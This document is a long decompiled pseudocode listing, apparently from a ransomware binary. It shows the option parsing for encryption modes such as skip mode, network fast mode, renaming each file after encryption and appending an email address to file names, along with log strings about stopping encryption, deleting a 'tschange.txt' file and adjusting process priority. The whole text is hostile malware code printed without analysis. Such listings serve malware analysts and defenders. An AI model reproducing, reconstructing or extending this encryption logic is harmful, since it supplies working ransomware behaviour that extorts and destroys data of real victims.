                                                                    									E00E75590(_t736,  &_v76, _t884, _t913, _t498,  &_v208);
                                                                    								} else {
                                                                    									asm("movups xmm0, [ebp-0xc4]");
                                                                    									 *(_t498 + 0x10) = 0;
                                                                    									_v208 = 0;
                                                                    									asm("movups [eax], xmm0");
                                                                    									asm("movq xmm0, [ebp-0xb4]");
                                                                    									asm("movq [eax+0x10], xmm0");
                                                                    									_v72 = _v72 + 0x18;
                                                                    									_v192 = 0;
                                                                    									_v188 = 0xf;
                                                                    								}
                                                                    								_v16 = 1;
                                                                    								L00E83B80(_t736,  &_v208, _t884);
                                                                    								_t752 = _v76;
                                                                    								_t501 = _v72;
                                                                    								_v128 = _t752;
                                                                    								_v136 = _t501;
                                                                    								__eflags = _t752 - _t501;
                                                                    								if(_t752 == _t501) {
                                                                    									L162:
                                                                    									CloseHandle(_v132);
                                                                    									_v16 = 0x21;
                                                                    									_t737 =  *0xf29240; // 0x1a
                                                                    									__eflags = 0x7ffffffe - _t737 - 0xd;
                                                                    									if(0x7ffffffe - _t737 < 0xd) {
                                                                    										goto L173;
                                                                    									}
                                                                    									__eflags =  *0xf29244 - 8;
                                                                    									_t506 =  >=  ?  *0xf29230 : 0xf29230;
                                                                    									_t507 = E00E77D30( &_v916, _t867, _v80, _t737,  >=  ?  *0xf29230 : 0xf29230, _t737, L"\\tschange.txt", 0xd);
                                                                    									_t887 = _v124 | 0x00000080;
                                                                    									_v124 = _t887;
                                                                    									__eflags = _t507[0xa] - 8;
                                                                    									if(_t507[0xa] >= 8) {
                                                                    										_t507 =  *_t507;
                                                                    									}
                                                                    									DeleteFileW(_t507);
                                                                    									_t884 = _t887 & 0xffffff7f;
                                                                    									_v124 = _t884;
                                                                    									_v16 = 1;
                                                                    									L00E59AF0(_t736,  &_v916, _t884);
                                                                    									_v16 = 0xffffffff;
                                                                    									_t912 = _v76;
                                                                    									__eflags = _t912;
                                                                    									if(_t912 == 0) {
                                                                    										goto L172;
                                                                    									} else {
                                                                    										_t884 = _v72;
                                                                    										__eflags = _t912 - _t884;
                                                                    										if(_t912 == _t884) {
                                                                    											L169:
                                                                    											_t514 = _t912;
                                                                    											_t756 = (_v68 - _t912 >> 3) * 0xaaaaaaab + (_v68 - _t912 >> 3) * 0xaaaaaaab * 2 << 3;
                                                                    											__eflags = _t756 - 0x1000;
                                                                    											if(_t756 < 0x1000) {
                                                                    												L171:
                                                                    												_push(_t756);
                                                                    												E00EA7674(_t912);
                                                                    												_t884 = _v124;
                                                                    												_t956 = _t956 + 8;
                                                                    												_v76 = 0;
                                                                    												_v72 = 0;
                                                                    												_v68 = 0;
                                                                    												goto L172;
                                                                    											}
                                                                    											_t912 =  *(_t912 - 4);
                                                                    											_t737 = _t756 + 0x23;
                                                                    											__eflags = _t514 - _t912 + 0xfffffffc - 0x1f;
                                                                    											if(__eflags > 0) {
                                                                    												goto L174;
                                                                    											}
                                                                    											goto L171;
                                                                    										} else {
                                                                    											goto L167;
                                                                    										}
                                                                    										do {
                                                                    											L167:
                                                                    											L00E83B80(_t736, _t912, _t884);
                                                                    											_t912 = _t912 + 0x18;
                                                                    											__eflags = _t912 - _t884;
                                                                    										} while (_t912 != _t884);
                                                                    										_t912 = _v76;
                                                                    										goto L169;
                                                                    									}
                                                                    								} else {
                                                                    									do {
                                                                    										__eflags =  *((intOrPtr*)(_t752 + 0x14)) - 0x10;
                                                                    										_t884 =  *(_t752 + 0x10);
                                                                    										_v40 = 0;
                                                                    										_v36 = 0;
                                                                    										_v64 = _t752;
                                                                    										if( *((intOrPtr*)(_t752 + 0x14)) >= 0x10) {
                                                                    											_v64 =  *_t752;
                                                                    										}
                                                                    										__eflags = _t884 - 0x10;
                                                                    										if(_t884 >= 0x10) {
                                                                    											_t915 = _t884 | 0x0000000f;
                                                                    											__eflags = _t915 - 0x7fffffff;
                                                                    											_t912 =  >  ? 0x7fffffff : _t915;
                                                                    											_t521 = _t912 + 1;
                                                                    											__eflags = _t521 - 0x1000;
                                                                    											if(_t521 < 0x1000) {
                                                                    												__eflags = _t521;
                                                                    												if(__eflags == 0) {
                                                                    													_t758 = 0;
                                                                    													__eflags = 0;
                                                                    												} else {
                                                                    													_push(_t521);
                                                                    													_t731 = E00EA76B3(_t736, _t867, _t884, _t912, __eflags);
                                                                    													_t956 = _t956 + 4;
                                                                    													_t758 = _t731;
                                                                    												}
                                                                    												L37:
                                                                    												_v56 = _t758;
                                                                    												E00EA90F0(_t758, _v64, _t884 + 1);
                                                                    												_t956 = 0xc + _t956;
                                                                    												_v36 = _t912;
                                                                    												goto L38;
                                                                    											}
                                                                    											_t104 = _t521 + 0x23; // 0x2d
                                                                    											_t737 = _t104;
                                                                    											__eflags = _t737 - _t521;
                                                                    											if(__eflags <= 0) {
                                                                    												L175:
                                                                    												L00E598B0(_t736, _t867, _t884, _t912, _t965);
                                                                    												goto L176;
                                                                    											}
                                                                    											_push(_t737);
                                                                    											_t732 = E00EA76B3(_t736, _t867, _t884, _t912, __eflags);
                                                                    											_t956 = _t956 + 4;
                                                                    											__eflags = _t732;
                                                                    											if(__eflags == 0) {
                                                                    												L174:
                                                                    												E00EABFBF(_t736, _t737, _t867, _t884, _t965);
                                                                    												goto L175;
                                                                    											}
                                                                    											_t105 = _t732 + 0x23; // 0x23
                                                                    											_t758 = _t105 & 0xffffffe0;
                                                                    											 *(_t758 - 4) = _t732;
                                                                    											goto L37;
                                                                    										} else {
                                                                    											asm("movups xmm0, [eax]");
                                                                    											_v36 = 0xf;
                                                                    											asm("movups [ebp-0x2c], xmm0");
                                                                    											L38:
                                                                    											_v40 = _t884;
                                                                    											_v16 = 5;
                                                                    											__eflags = _v36 - 0x10;
                                                                    											_t884 = _v40;
                                                                    											_t917 =  >=  ? _v56 :  &_v56;
                                                                    											__eflags = _t884 - 6;
                                                                    											if(_t884 < 6) {
                                                                    												L44:
                                                                    												__eflags = _v36 - 0x10;
                                                                    												_t919 =  >=  ? _v56 :  &_v56;
                                                                    												__eflags = _t884 - 4;
                                                                    												if(_t884 < 4) {
                                                                    													L49:
                                                                    													__eflags = _v36 - 0x10;
                                                                    													_t760 =  >=  ? _v56 :  &_v56;
                                                                    													_v60 = _t760;
                                                                    													__eflags = _t884 - 0x10;
                                                                    													if(_t884 < 0x10) {
                                                                    														L62:
                                                                    														__eflags = _v36 - 0x10;
                                                                    														_t912 =  >=  ? _v56 :  &_v56;
                                                                    														__eflags = _t884 - 0xa;
                                                                    														if(_t884 < 0xa) {
                                                                    															L69:
                                                                    															_push(_t760);
                                                                    															_t761 =  &_v56;
                                                                    															_t524 = E00E71A90(_t761, "iop=");
                                                                    															__eflags = _t524 - 0xffffffff;
                                                                    															if(_t524 == 0xffffffff) {
                                                                    																_push(_t761);
                                                                    																_t762 =  &_v56;
                                                                    																_t525 = E00E71A90(_t762, "buffer=");
                                                                    																__eflags = _t525 - 0xffffffff;
                                                                    																if(_t525 == 0xffffffff) {
                                                                    																	_push(_t762);
                                                                    																	_t763 =  &_v56;
                                                                    																	_t526 = E00E71A90(_t763, "threads=");
                                                                    																	__eflags = _t526 - 0xffffffff;
                                                                    																	if(_t526 == 0xffffffff) {
                                                                    																		_push(_t763);
                                                                    																		_t764 =  &_v56;
                                                                    																		_t527 = E00E71A90(_t764, "skipmode=");
                                                                    																		__eflags = _t527 - 0xffffffff;
                                                                    																		if(_t527 == 0xffffffff) {
                                                                    																			_push(_t764);
                                                                    																			_t765 =  &_v56;
                                                                    																			_t528 = E00E71A90(_t765, "networkfastmode=");
                                                                    																			__eflags = _t528 - 0xffffffff;
                                                                    																			if(_t528 == 0xffffffff) {
                                                                    																				_push(_t765);
                                                                    																				_t766 =  &_v56;
                                                                    																				_t529 = E00E71A90(_t766, "fastmode=");
                                                                    																				__eflags = _t529 - 0xffffffff;
                                                                    																				if(_t529 == 0xffffffff) {
                                                                    																					_push(_t766);
                                                                    																					_t767 =  &_v56;
                                                                    																					_t530 = E00E71A90(_t767, "emailaftername");
                                                                    																					__eflags = _t530 - 0xffffffff;
                                                                    																					if(_t530 == 0xffffffff) {
                                                                    																						_push(_t767);
                                                                    																						_t768 =  &_v56;
                                                                    																						_t531 = E00E71A90(_t768, "renameeachfile");
                                                                    																						__eflags = _t531 - 0xffffffff;
                                                                    																						if(_t531 == 0xffffffff) {
                                                                    																							_push(_t768);
                                                                    																							_t532 = E00E71A90( &_v56, "stopandquit");
                                                                    																							__eflags = _t532 - 0xffffffff;
                                                                    																							if(_t532 != 0xffffffff) {
                                                                    																								_t867 = 1;
                                                                    																								E00E59EB0(_t736, L"will stop encrypting and exit ", 1, _t884, _t912);
                                                                    																								_t912 =  *0xf2c294;
                                                                    																								_v60 = 0;
                                                                    																								_t536 = GetCurrentProcess();
                                                                    																								 *0xecd328();
                                                                    																								NtSetInformationProcess(_t536, 0x1d,  &_v60, 4);
                                                                    																								 *0xf2c0a8 = 1;
                                                                    																							}
                                                                    																						} else {
                                                                    																							_t867 = 1;
                                                                    																							E00E59EB0(_t736, L"will rename each file after encrypted ", 1, _t884, _t912);
                                                                    																							 *0xf2c097 = 1;
                                                                    																						}
                                                                    																					} else {
                                                                    																						_t867 = 1;
                                                                    																						E00E59EB0(_t736, L"will put your email address at the end of file name", 1, _t884, _t912);
                                                                    																						 *0xeef9d3 = 0;
                                                                    																					}
                                                                    																					goto L161;
                                                                    																				}
                                                                    																				__eflags = _v36 - 0x10;
                                                                    																				_t922 =  >=  ? _v56 :  &_v56;
                                                                    																				__eflags = _t884;
                                                                    																				if(_t884 == 0) {
                                                                    																					L137:
                                                                    																					_t541 = _t529 | 0xffffffff;
                                                                    																					__eflags = _t529 | 0xffffffff;
                                                                    																					L138:
                                                                    																					_t737 =  &_v56;
                                                                    																					_t923 = E00E719C0(_t736,  &_v56, _t884,  &_v772, 9, _t541);
                                                                    																					_v16 = 0x1a;
                                                                    																					_t544 = E00EACDB8(__eflags);
                                                                    																					__eflags =  *((intOrPtr*)(_t923 + 0x14)) - 0x10;
                                                                    																					_t888 = _t544;
                                                                    																					if( *((intOrPtr*)(_t923 + 0x14)) >= 0x10) {
                                                                    																						_t923 =  *_t923;
                                                                    																					}
                                                                    																					 *_t888 = 0;
                                                                    																					_t546 = E00EACCEB(_t737, _t923,  &_v116, 0xa);
                                                                    																					_t956 = 0xc + _t956;
                                                                    																					_v60 = _t546;
                                                                    																					__eflags = _t923 - _v116;
                                                                    																					if(_t923 == _v116) {
                                                                    																						L177:
                                                                    																						_push("invalid stoi argument");
                                                                    																						E00EA5A97();
                                                                    																						asm("int3");
                                                                    																						_push(_t949);
                                                                    																						_push(0xffffffff);
                                                                    																						_push(E00EC4D80);
                                                                    																						_push( *[fs:0x0]);
                                                                    																						_t468 =  *0xeef074; // 0xa6abe2d4
                                                                    																						_push(_t468 ^ _t956);
                                                                    																						 *[fs:0x0] =  &_v944;
                                                                    																						_t471 = E00EAEBD8( *((intOrPtr*)(_t737 + 0x14)));
                                                                    																						 *[fs:0x0] = _v944;
                                                                    																						return _t471;
                                                                    																					} else {
                                                                    																						__eflags =  *_t888 - 0x22;
                                                                    																						if( *_t888 == 0x22) {
                                                                    																							L176:
                                                                    																							_push("stoi argument out of range");
                                                                    																							E00EA5AD7();
                                                                    																							goto L177;
                                                                    																						}
                                                                    																						_v16 = 5;
                                                                    																						L00E83B80(_t736,  &_v772, _t888);
                                                                    																						_t548 = _v60;
                                                                    																						__eflags = _t548 - 0xff;
                                                                    																						_t549 =  >  ? 0xff : _t548;
                                                                    																						__eflags = _v36 - 0x10;
                                                                    																						 *0xf2c093 =  >  ? 0xff : _t548;
                                                                    																						_t925 =  >=  ? _v56 :  &_v56;
                                                                    																						_t550 = _v40;
                                                                    																						__eflags = _t550;
                                                                    																						if(_t550 == 0) {
                                                                    																							L145:
                                                                    																							_t551 = _t550 | 0xffffffff;
                                                                    																							__eflags = _t551;
                                                                    																							L146:
                                                                    																							__eflags = _t551 - 0xffffffff;
                                                                    																							if(_t551 == 0xffffffff) {
                                                                    																								L152:
                                                                    																								_t912 = E00E839A0(_t736,  &_v892,  *0xeef9d2 & 0x000000ff, _t888, _t925);
                                                                    																								_v16 = 0x1c;
                                                                    																								_t553 = E00E839A0(_t736,  &_v868, ( *0xf2c093 & 0x000000ff) + 1, _t888, _t912);
                                                                    																								_v16 = 0x1d;
                                                                    																								_t554 = E00E73F90(_t736,  &_v844, L"skiping mode enabled 1/", _t553);
                                                                    																								_t956 = _t956 + 4;
                                                                    																								_v16 = 0x1f;
                                                                    																								_t555 = E00E59260(_t554, L" for files bigger than ");
                                                                    																								_t890 = _v124 | 0x00000020;
                                                                    																								_v348 = 0;
                                                                    																								_v344 = 0;
                                                                    																								asm("movups xmm0, [eax]");
                                                                    																								asm("movups [ebp-0x160], xmm0");
                                                                    																								asm("movq xmm0, [eax+0x10]");
                                                                    																								asm("movq [ebp-0x150], xmm0");
                                                                    																								 *(_t555 + 0x10) = 0;
                                                                    																								 *((intOrPtr*)(_t555 + 0x14)) = 7;
                                                                    																								 *_t555 = 0;
                                                                    																								_v124 = _t890;
                                                                    																								_v16 = 0x20;
                                                                    																								_push(_t912);
                                                                    																								_push( &_v364);
                                                                    																								_push(_v80);
                                                                    																								_t557 = E00E77B80( &_v820);
                                                                    																								_t891 = _t890 | 0x00000040;
                                                                    																								_v124 = _t891;
                                                                    																								__eflags =  *((intOrPtr*)(_t557 + 0x14)) - 8;
                                                                    																								if( *((intOrPtr*)(_t557 + 0x14)) >= 8) {
                                                                    																									_t557 =  *_t557;
                                                                    																								}
                                                                    																								_t867 = 1;
                                                                    																								E00E59EB0(_t736, _t557, 1, _t891, _t912);
                                                                    																								_t892 = _t891 & 0xffffffbf;
                                                                    																								_v124 = _t892;
                                                                    																								_v16 = 0x1f;
                                                                    																								L00E59AF0(_t736,  &_v820, _t892);
                                                                    																								_t884 = _t892 & 0xffffffdf;
                                                                    																								_v124 = _t892 & 0xffffffdf;
                                                                    																								_v16 = 0x1e;
                                                                    																								L00E59AF0(_t736,  &_v364, _t892 & 0xffffffdf);
                                                                    																								_v16 = 0x1d;
                                                                    																								L00E59AF0(_t736,  &_v844, _t892 & 0xffffffdf);
                                                                    																								_v16 = 0x1c;
                                                                    																								L00E59AF0(_t736,  &_v868, _t892 & 0xffffffdf);
                                                                    																								_v16 = 5;
                                                                    																								L00E59AF0(_t736,  &_v892, _t884);
                                                                    																								goto L161;
                                                                    																							}
                                                                    																							_push(0xffffffff);
                                                                    																							_t564 = E00E71A90( &_v56, ":");
                                                                    																							_t737 =  &_v56;
                                                                    																							_t925 = E00E719C0(_t736,  &_v56, _t888,  &_v796, _t564 + 1, 0xff);
                                                                    																							_v16 = 0x1b;
                                                                    																							_t568 = E00EACDB8(__eflags);
                                                                    																							__eflags =  *((intOrPtr*)(_t925 + 0x14)) - 0x10;
                                                                    																							_t888 = _t568;
                                                                    																							if( *((intOrPtr*)(_t925 + 0x14)) >= 0x10) {
                                                                    																								_t925 =  *_t925;
                                                                    																							}
                                                                    																							 *_t888 = 0;
                                                                    																							_t570 = E00EACCEB(_t737, _t925,  &_v120, 0xa);
                                                                    																							_t956 = 0xc + _t956;
                                                                    																							__eflags = _t925 - _v120;
                                                                    																							if(_t925 == _v120) {
                                                                    																								goto L177;
                                                                    																							} else {
                                                                    																								__eflags =  *_t888 - 0x22;
                                                                    																								if( *_t888 == 0x22) {
                                                                    																									goto L176;
                                                                    																								}
                                                                    																								 *0xeef9d2 = _t570;
                                                                    																								_v16 = 5;
                                                                    																								L00E83B80(_t736,  &_v796, _t888);
                                                                    																								goto L152;
                                                                    																							}
                                                                    																						}
                                                                    																						_t550 = E00EAA7C0(_t925, 0x3a, _t550);
                                                                    																						_t956 = 0xc + _t956;
                                                                    																						__eflags = _t550;
                                                                    																						if(_t550 == 0) {
                                                                    																							goto L145;
                                                                    																						}
                                                                    																						_t551 = _t550 - _t925;
                                                                    																						goto L146;
                                                                    																					}
                                                                    																				}
                                                                    																				_t529 = E00EAA7C0(_t922, 0x3a, _t884);
                                                                    																				_t956 = 0xc + _t956;
                                                                    																				__eflags = _t529;
                                                                    																				if(_t529 == 0) {
                                                                    																					goto L137;
                                                                    																				}
                                                                    																				_t541 = _t529 - _t922;
                                                                    																				goto L138;
                                                                    																			}
                                                                    																			__eflags = _v36 - 0x10;
                                                                    																			_t927 =  >=  ? _v56 :  &_v56;
                                                                    																			__eflags = _t884;
                                                                    																			if(_t884 == 0) {
                                                                    																				L115:
                                                                    																				_t572 = _t528 | 0xffffffff;
                                                                    																				__eflags = _t528 | 0xffffffff;
                                                                    																				L116:
                                                                    																				_t737 =  &_v56;
                                                                    																				_t928 = E00E719C0(_t736,  &_v56, _t884,  &_v628, 9, _t572);
                                                                    																				_v16 = 0x13;
                                                                    																				_t575 = E00EACDB8(__eflags);
                                                                    																				__eflags =  *((intOrPtr*)(_t928 + 0x14)) - 0x10;
                                                                    																				_t893 = _t575;
                                                                    																				if( *((intOrPtr*)(_t928 + 0x14)) >= 0x10) {
                                                                    																					_t928 =  *_t928;
                                                                    																				}
                                                                    																				 *_t893 = 0;
                                                                    																				_t577 = E00EACCEB(_t737, _t928,  &_v108, 0xa);
                                                                    																				_t956 = 0xc + _t956;
                                                                    																				_v60 = _t577;
                                                                    																				__eflags = _t928 - _v108;
                                                                    																				if(_t928 == _v108) {
                                                                    																					goto L177;
                                                                    																				} else {
                                                                    																					__eflags =  *_t893 - 0x22;
                                                                    																					if( *_t893 == 0x22) {
                                                                    																						goto L176;
                                                                    																					}
                                                                    																					_v16 = 5;
                                                                    																					L00E83B80(_t736,  &_v628, _t893);
                                                                    																					_t579 = _v60;
                                                                    																					__eflags = _t579 - 0xff;
                                                                    																					_t580 =  >  ? 0xff : _t579;
                                                                    																					__eflags = _v36 - 0x10;
                                                                    																					 *0xf2c092 =  >  ? 0xff : _t579;
                                                                    																					_t930 =  >=  ? _v56 :  &_v56;
                                                                    																					_t581 = _v40;
                                                                    																					__eflags = _t581;
                                                                    																					if(_t581 == 0) {
                                                                    																						L123:
                                                                    																						_t582 = _t581 | 0xffffffff;
                                                                    																						__eflags = _t582;
                                                                    																						L124:
                                                                    																						__eflags = _t582 - 0xffffffff;
                                                                    																						if(_t582 == 0xffffffff) {
                                                                    																							L130:
                                                                    																							_t912 = E00E839A0(_t736,  &_v748,  *0xeef9d1 & 0x000000ff, _t893, _t930);
                                                                    																							_v16 = 0x15;
                                                                    																							_t584 = E00E839A0(_t736,  &_v724, ( *0xf2c092 & 0x000000ff) + 1, _t893, _t912);
                                                                    																							_v16 = 0x16;
                                                                    																							_t585 = E00E73F90(_t736,  &_v700, L"special skiping mode for network enabled 1/", _t584);
                                                                    																							_t956 = _t956 + 4;
                                                                    																							_v16 = 0x18;
                                                                    																							_t586 = E00E59260(_t585, L" for files bigger than ");
                                                                    																							_t895 = _v124 | 0x00000008;
                                                                    																							_v324 = 0;
                                                                    																							_v320 = 0;
                                                                    																							asm("movups xmm0, [eax]");
                                                                    																							asm("movups [ebp-0x148], xmm0");
                                                                    																							asm("movq xmm0, [eax+0x10]");
                                                                    																							asm("movq [ebp-0x138], xmm0");
                                                                    																							 *(_t586 + 0x10) = 0;
                                                                    																							 *((intOrPtr*)(_t586 + 0x14)) = 7;
                                                                    																							 *_t586 = 0;
                                                                    																							_v124 = _t895;
                                                                    																							_v16 = 0x19;
                                                                    																							_push(_t912);
                                                                    																							_push( &_v340);
                                                                    																							_push(_v80);
                                                                    																							_t588 = E00E77B80( &_v676);
                                                                    																							_t896 = _t895 | 0x00000010;
                                                                    																							_v124 = _t896;
                                                                    																							__eflags =  *((intOrPtr*)(_t588 + 0x14)) - 8;
                                                                    																							if( *((intOrPtr*)(_t588 + 0x14)) >= 8) {
                                                                    																								_t588 =  *_t588;
                                                                    																							}
                                                                    																							_t867 = 1;
                                                                    																							E00E59EB0(_t736, _t588, 1, _t896, _t912);
                                                                    																							_t897 = _t896 & 0xffffffef;
                                                                    																							_v124 = _t897;
                                                                    																							_v16 = 0x18;
                                                                    																							L00E59AF0(_t736,  &_v676, _t897);
                                                                    																							_t884 = _t897 & 0xfffffff7;
                                                                    																							_v124 = _t897 & 0xfffffff7;
                                                                    																							_v16 = 0x17;
                                                                    																							L00E59AF0(_t736,  &_v340, _t897 & 0xfffffff7);
                                                                    																							_v16 = 0x16;
                                                                    																							L00E59AF0(_t736,  &_v700, _t897 & 0xfffffff7);
                                                                    																							_v16 = 0x15;
                                                                    																							L00E59AF0(_t736,  &_v724, _t897 & 0xfffffff7);
                                                                    																							_v16 = 5;
                                                                    																							L00E59AF0(_t736,  &_v748, _t884);
                                                                    																							goto L161;
                                                                    																						}
                                                                    																						_push(0xffffffff);
                                                                    																						_t595 = E00E71A90( &_v56, ":");
                                                                    																						_t737 =  &_v56;
                                                                    																						_t930 = E00E719C0(_t736,  &_v56, _t893,  &_v652, _t595 + 1, 0xff);
                                                                    																						_v16 = 0x14;
                                                                    																						_t599 = E00EACDB8(__eflags);
                                                                    																						__eflags =  *((intOrPtr*)(_t930 + 0x14)) - 0x10;
                                                                    																						_t893 = _t599;
                                                                    																						if( *((intOrPtr*)(_t930 + 0x14)) >= 0x10) {
                                                                    																							_t930 =  *_t930;
                                                                    																						}
                                                                    																						 *_t893 = 0;
                                                                    																						_t601 = E00EACCEB(_t737, _t930,  &_v112, 0xa);
                                                                    																						_t956 = 0xc + _t956;
                                                                    																						__eflags = _t930 - _v112;
                                                                    																						if(_t930 == _v112) {
                                                                    																							goto L177;
                                                                    																						} else {
                                                                    																							__eflags =  *_t893 - 0x22;
                                                                    																							if( *_t893 == 0x22) {
                                                                    																								goto L176;
                                                                    																							}
                                                                    																							 *0xeef9d1 = _t601;
                                                                    																							_v16 = 5;
                                                                    																							L00E83B80(_t736,  &_v652, _t893);
                                                                    																							goto L130;
                                                                    																						}
                                                                    																					}
                                                                    																					_t581 = E00EAA7C0(_t930, 0x3a, _t581);
                                                                    																					_t956 = 0xc + _t956;
                                                                    																					__eflags = _t581;
                                                                    																					if(_t581 == 0) {
                                                                    																						goto L123;
                                                                    																					}
                                                                    																					_t582 = _t581 - _t930;
                                                                    																					goto L124;
                                                                    																				}
                                                                    																			}
                                                                    																			_t528 = E00EAA7C0(_t927, 0x3a, _t884);
                                                                    																			_t956 = 0xc + _t956;
                                                                    																			__eflags = _t528;
                                                                    																			if(_t528 == 0) {
                                                                    																				goto L115;
                                                                    																			}
                                                                    																			_t572 = _t528 - _t927;
                                                                    																			goto L116;
                                                                    																		}
                                                                    																		__eflags = _v36 - 0x10;
                                                                    																		_t932 =  >=  ? _v56 :  &_v56;
                                                                    																		__eflags = _t884;
                                                                    																		if(_t884 == 0) {
                                                                    																			L93:
                                                                    																			_t603 = _t527 | 0xffffffff;
                                                                    																			__eflags = _t527 | 0xffffffff;
                                                                    																			L94:
                                                                    																			_t737 =  &_v56;
                                                                    																			_t933 = E00E719C0(_t736,  &_v56, _t884,  &_v484, 9, _t603);
                                                                    																			_v16 = 0xc;
                                                                    																			_t606 = E00EACDB8(__eflags);
                                                                    																			__eflags =  *((intOrPtr*)(_t933 + 0x14)) - 0x10;
                                                                    																			_t898 = _t606;
                                                                    																			if( *((intOrPtr*)(_t933 + 0x14)) >= 0x10) {
                                                                    																				_t933 =  *_t933;
                                                                    																			}
                                                                    																			 *_t898 = 0;
                                                                    																			_t608 = E00EACCEB(_t737, _t933,  &_v92, 0xa);
                                                                    																			_t956 = 0xc + _t956;
                                                                    																			_v60 = _t608;
                                                                    																			__eflags = _t933 - _v92;
                                                                    																			if(_t933 == _v92) {
                                                                    																				goto L177;
                                                                    																			} else {
                                                                    																				__eflags =  *_t898 - 0x22;
                                                                    																				if( *_t898 == 0x22) {
                                                                    																					goto L176;
                                                                    																				}
                                                                    																				_v16 = 5;
                                                                    																				L00E83B80(_t736,  &_v484, _t898);
                                                                    																				_t610 = _v60;
                                                                    																				__eflags = _t610 - 0xff;
                                                                    																				_t611 =  >  ? 0xff : _t610;
                                                                    																				__eflags = _v36 - 0x10;
                                                                    																				 *0xf2c093 =  >  ? 0xff : _t610;
                                                                    																				_t935 =  >=  ? _v56 :  &_v56;
                                                                    																				_t612 = _v40;
                                                                    																				__eflags = _t612;
                                                                    																				if(_t612 == 0) {
                                                                    																					L101:
                                                                    																					_t613 = _t612 | 0xffffffff;
                                                                    																					__eflags = _t613;
                                                                    																					L102:
                                                                    																					__eflags = _t613 - 0xffffffff;
                                                                    																					if(_t613 == 0xffffffff) {
                                                                    																						L108:
                                                                    																						_t912 = E00E839A0(_t736,  &_v604,  *0xeef9d2 & 0x000000ff, _t898, _t935);
                                                                    																						_v16 = 0xe;
                                                                    																						_t615 = E00E839A0(_t736,  &_v580, ( *0xf2c093 & 0x000000ff) + 1, _t898, _t912);
                                                                    																						_v16 = 0xf;
                                                                    																						_t616 = E00E73F90(_t736,  &_v556, L"skiping mode enabled 1/", _t615);
                                                                    																						_t956 = _t956 + 4;
                                                                    																						_v16 = 0x11;
                                                                    																						_t617 = E00E59260(_t616, L" for files bigger than ");
                                                                    																						_t900 = _v124 | 0x00000002;
                                                                    																						_v300 = 0;
                                                                    																						_v296 = 0;
                                                                    																						asm("movups xmm0, [eax]");
                                                                    																						asm("movups [ebp-0x130], xmm0");
                                                                    																						asm("movq xmm0, [eax+0x10]");
                                                                    																						asm("movq [ebp-0x120], xmm0");
                                                                    																						 *(_t617 + 0x10) = 0;
                                                                    																						 *((intOrPtr*)(_t617 + 0x14)) = 7;
                                                                    																						 *_t617 = 0;
                                                                    																						_v124 = _t900;
                                                                    																						_v16 = 0x12;
                                                                    																						_push(_t912);
                                                                    																						_push( &_v316);
                                                                    																						_push(_v80);
                                                                    																						_t619 = E00E77B80( &_v532);
                                                                    																						_t901 = _t900 | 0x00000004;
                                                                    																						_v124 = _t901;
                                                                    																						__eflags =  *((intOrPtr*)(_t619 + 0x14)) - 8;
                                                                    																						if( *((intOrPtr*)(_t619 + 0x14)) >= 8) {
                                                                    																							_t619 =  *_t619;
                                                                    																						}
                                                                    																						_t867 = 1;
                                                                    																						E00E59EB0(_t736, _t619, 1, _t901, _t912);
                                                                    																						_t902 = _t901 & 0xfffffffb;
                                                                    																						_v124 = _t902;
                                                                    																						_v16 = 0x11;
                                                                    																						L00E59AF0(_t736,  &_v532, _t902);
                                                                    																						_t884 = _t902 & 0xfffffffd;
                                                                    																						_v124 = _t902 & 0xfffffffd;
                                                                    																						_v16 = 0x10;
                                                                    																						L00E59AF0(_t736,  &_v316, _t902 & 0xfffffffd);
                                                                    																						_v16 = 0xf;
                                                                    																						L00E59AF0(_t736,  &_v556, _t902 & 0xfffffffd);
                                                                    																						_v16 = 0xe;
                                                                    																						L00E59AF0(_t736,  &_v580, _t902 & 0xfffffffd);
                                                                    																						_v16 = 5;
                                                                    																						L00E59AF0(_t736,  &_v604, _t884);
                                                                    																						goto L161;
                                                                    																					}
                                                                    																					_push(0xffffffff);
                                                                    																					_t626 = E00E71A90( &_v56, ":");
                                                                    																					_t737 =  &_v56;
                                                                    																					_t935 = E00E719C0(_t736,  &_v56, _t898,  &_v508, _t626 + 1, 0xff);
                                                                    																					_v16 = 0xd;
                                                                    																					_t630 = E00EACDB8(__eflags);
                                                                    																					__eflags =  *((intOrPtr*)(_t935 + 0x14)) - 0x10;
                                                                    																					_t898 = _t630;
                                                                    																					if( *((intOrPtr*)(_t935 + 0x14)) >= 0x10) {
                                                                    																						_t935 =  *_t935;
                                                                    																					}
                                                                    																					 *_t898 = 0;
                                                                    																					_t632 = E00EACCEB(_t737, _t935,  &_v104, 0xa);
                                                                    																					_t956 = 0xc + _t956;
                                                                    																					__eflags = _t935 - _v104;
                                                                    																					if(_t935 == _v104) {
                                                                    																						goto L177;
                                                                    																					} else {
                                                                    																						__eflags =  *_t898 - 0x22;
                                                                    																						if( *_t898 == 0x22) {
                                                                    																							goto L176;
                                                                    																						}
                                                                    																						 *0xeef9d2 = _t632;
                                                                    																						_v16 = 5;
                                                                    																						L00E83B80(_t736,  &_v508, _t898);
                                                                    																						goto L108;
                                                                    																					}
                                                                    																				}
                                                                    																				_t612 = E00EAA7C0(_t935, 0x3a, _t612);
                                                                    																				_t956 = 0xc + _t956;
                                                                    																				__eflags = _t612;
                                                                    																				if(_t612 == 0) {
                                                                    																					goto L101;
                                                                    																				}
                                                                    																				_t613 = _t612 - _t935;
                                                                    																				goto L102;
                                                                    																			}
                                                                    																		}
                                                                    																		_t527 = E00EAA7C0(_t932, 0x3a, _t884);
                                                                    																		_t956 = 0xc + _t956;
                                                                    																		__eflags = _t527;
                                                                    																		if(_t527 == 0) {
                                                                    																			goto L93;
                                                                    																		}
                                                                    																		_t603 = _t527 - _t932;
                                                                    																		goto L94;
                                                                    																	}
                                                                    																	_t216 = _t884 - 1; // -1
                                                                    																	_t737 =  &_v56;
                                                                    																	_t936 = E00E719C0(_t736,  &_v56, _t884,  &_v460, 8, _t216);
                                                                    																	_v16 = 0xa;
                                                                    																	_t637 = E00EACDB8(__eflags);
                                                                    																	__eflags =  *((intOrPtr*)(_t936 + 0x14)) - 0x10;
                                                                    																	_t903 = _t637;
                                                                    																	if( *((intOrPtr*)(_t936 + 0x14)) >= 0x10) {
                                                                    																		_t936 =  *_t936;
                                                                    																	}
                                                                    																	 *_t903 = 0;
                                                                    																	_t639 = E00EACCEB(_t737, _t936,  &_v100, 0xa);
                                                                    																	_t956 = 0xc + _t956;
                                                                    																	_v60 = _t639;
                                                                    																	__eflags = _t936 - _v100;
                                                                    																	if(_t936 == _v100) {
                                                                    																		goto L177;
                                                                    																	} else {
                                                                    																		__eflags =  *_t903 - 0x22;
                                                                    																		if( *_t903 == 0x22) {
                                                                    																			goto L176;
                                                                    																		}
